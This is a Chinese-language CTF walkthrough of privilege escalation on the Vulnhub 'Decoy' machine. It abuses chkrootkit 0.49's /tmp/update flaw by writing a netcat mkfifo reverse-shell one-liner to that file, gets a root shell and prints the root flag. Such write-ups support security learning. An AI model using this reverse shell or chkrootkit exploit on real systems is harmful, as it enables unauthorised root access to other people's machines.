Vulnhub Decoy提權補充

在拿到用戶296640a3b825115a47b68fc44501c828的密碼server后，為了方便觀察現象，同時開啟兩個shell,并且需要指定-t "bash --noprofile"以逃避受限shell,登錄成功后，要修改PATH環境變數，使其包含正常的環境變數:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat SV-502/logs/log.txt 

在日志檔案中看到有關chkrootkit的日志資訊，chkrootkit是檢查系統是否存在后門的工具，

在第1個目標主機shell中執行：

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+ 23309  0.0  0.0   6076   828 pts/1    S+   22:49   0:00 grep chk

從結果發現并沒有運行chkrootkit的行程

在第2個shell中執行：

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy 
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------

執行第5選項，也就是病毒掃描，而這可能與chkrootkit相關，也就是一旦選擇第5選項，可能就啟動chkrootkit，

選擇第5選項后，回到第1個shell查看行程：

但是仍然沒有出現chkrootkit

此時參考exploitdb上關于0.49版本的漏洞利用方法，在/tmp創建檔案名為update，此時內容隨意并且賦予執行權限：

Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

然后執行honeypot.decoy

此時回到第1個shell中查看行程（需要過一點時間）

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+   560  0.0  0.0   6076   884 pts/1    S+   22:59   0:00 grep chk
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+   562  0.0  0.0   6076   820 pts/1    S+   23:00   0:00 grep chk
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
root       571  2.0  0.1   2676  1936 ?        S    23:00   0:00 /bin/sh /root/chkrootkit-0.49/chkrootkit

發現PS輸出結果中有chkrootkit行程，當然到目前為止我們創建的update檔案里面的內容是沒有意義的字串，接下來就是修改update的內容，修改為反向shell命令：

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.230 5555 >/tmp/f' >/tmp/update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ chmod 777 /tmp/update

然后再次執行./honeypot.decoy,選擇選項5，也就是掃描病毒，

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy 
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.
--------------------------------------------------

┌──(kali?kali)-[~/Desktop/Vulnhub/Decoy]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.109] 48104
/bin/sh: 0: can't access tty; job control turned off
# cd /root
# ls -alh
total 3.1M
drwx------  4 root                             root                             4.0K Jul  7  2020 .
drwxr-xr-x 18 root                             root                             4.0K Jun 27  2020 ..
lrwxrwxrwx  1 root                             root                                9 Jul  7  2020 .bash_history -> /dev/null
-rw-r--r--  1 root                             root                              570 Jan 31  2010 .bashrc
drwxr-xr-x  2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jul 30  2009 chkrootkit-0.49
-rw-r--r--  1 root                             root                              39K Apr  9  2015 chkrootkit-0.49.tar.gz
drwxr-xr-x  3 root                             root                             4.0K Jun 27  2020 .local
-rw-r--r--  1 root                             root                             7.7K Jun 27  2020 log.txt
-rw-r--r--  1 root                             root                              148 Aug 17  2015 .profile
-rwxr-xr-x  1 root                             root                             3.0M Aug 22  2019 pspy
-rw-r--r--  1 root                             root                              924 Jul  7  2020 root.txt
-rw-r--r--  1 root                             root                              137 Jul  7  2020 script.sh
-rw-r--r--  1 root                             root                               66 Jul  7  2020 .selected_editor
-rw-r--r--  1 root                             root                              208 Jun 27  2020 .wget-hsts
# cat root.txt
  ........::::::::::::..           .......|...............::::::::........
     .:::::;;;;;;;;;;;:::::.... .     \   | ../....::::;;;;:::::.......
         .       ...........   / \\_   \  |  /     ......  .     ........./\
...:::../\\_  ......     ..._/'   \\\_  \###/   /\_    .../ \_.......   _//
.::::./   \\\ _   .../\    /'      \\\\#######//   \/\   //   \_   ....////
    _/      \\\\   _/ \\\ /  x       \\\\###////      \////     \__  _/////
  ./   x       \\\/     \/ x X           \//////                   \/////
 /     XxX     \\/         XxX X                                    ////   x
-----XxX-------------|-------XxX-----------*--------|---*-----|------------X--
       X        _X      *    X      **         **             x   **    *  X
      _X                    _X           x                *          x     X_


1c203242ab4b4509233ca210d50d2cc5

Thanks for playing! - Felipe Winsnes (@whitecr0wz)
# 

標籤：其他

上一篇：java開發學習框架

下一篇：返回列表